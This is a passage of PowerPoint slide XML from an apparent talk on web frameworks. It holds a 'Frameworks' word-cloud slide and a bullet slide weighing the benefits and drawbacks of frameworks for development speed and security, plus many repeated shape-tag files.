          <a:xfrm>
            <a:off x="519584" y="3873354"/>
            <a:ext cx="3832944" cy="717167"/>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accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5879124" y="4804580"/>
            <a:ext cx="2248487" cy="41351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1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8534399" y="358050"/>
            <a:ext cx="3786557" cy="604493"/>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accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214908" y="6023496"/>
            <a:ext cx="2807258" cy="549782"/>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accent5"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4875837" y="762076"/>
            <a:ext cx="2289098" cy="426115"/>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3"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8265021" y="4855099"/>
            <a:ext cx="3718057" cy="57163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accent5"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162426" y="1552162"/>
            <a:ext cx="6016284" cy="1581955"/>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6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908334" y="3281330"/>
            <a:ext cx="2221269" cy="301075"/>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accent3"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6956475" y="2024270"/>
            <a:ext cx="6016284" cy="1581955"/>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3"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9819250" y="1693302"/>
            <a:ext cx="2265655" cy="514405"/>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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323428" y="5511085"/>
            <a:ext cx="5477022" cy="849456"/>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6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10109983" y="3662579"/>
            <a:ext cx="2398542" cy="434562"/>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4"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2663484" y="1390633"/>
            <a:ext cx="2358682" cy="41920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2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275489" y="4925111"/>
            <a:ext cx="6491067" cy="923018"/>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7000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5879124" y="1201620"/>
            <a:ext cx="3462997" cy="711111"/>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3500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269631" y="489335"/>
            <a:ext cx="3685735" cy="636084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="164592" indent="-164592"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solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="-164592"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740664" indent="-164592"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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
            <a:lvl6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6pPr>
            <a:lvl7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7pPr>
            <a:lvl8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8pPr>
            <a:lvl9pPr marL="1033272" indent="-164592" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="336"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>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4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1148330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73867" y="1036984"/>
            <a:ext cx="7436235" cy="4807911"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254628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096347"/>
            <a:ext cx="7361620" cy="4852269"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402376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Frameworks, what about them?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Good</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Faster development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easier review if you’re familiar with the idioms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Safer applications if/when security controls are built-in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steep learning curve, especially if you need to learn a new one every couple of months</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If bugs and flaws are built in, your application has built-in problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third-party, often lower quality, code for all the things that are not built into the framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fragmented knowledge, poor documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="292608" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Ugly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Reality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can we choose not to use them? Vanilla JavaScript? No, not really. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39031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YNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag16.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag17.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag18.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag21.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag22.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag23.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag24.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag25.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag26.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag27.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag28.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag29.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag30.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag31.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag32.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag33.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag34.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag35.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag36.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag37.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag38.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag39.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag40.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag41.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag42.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag43.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag44.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="SYNOPSYS-SHAPE" val="Y"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag45.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
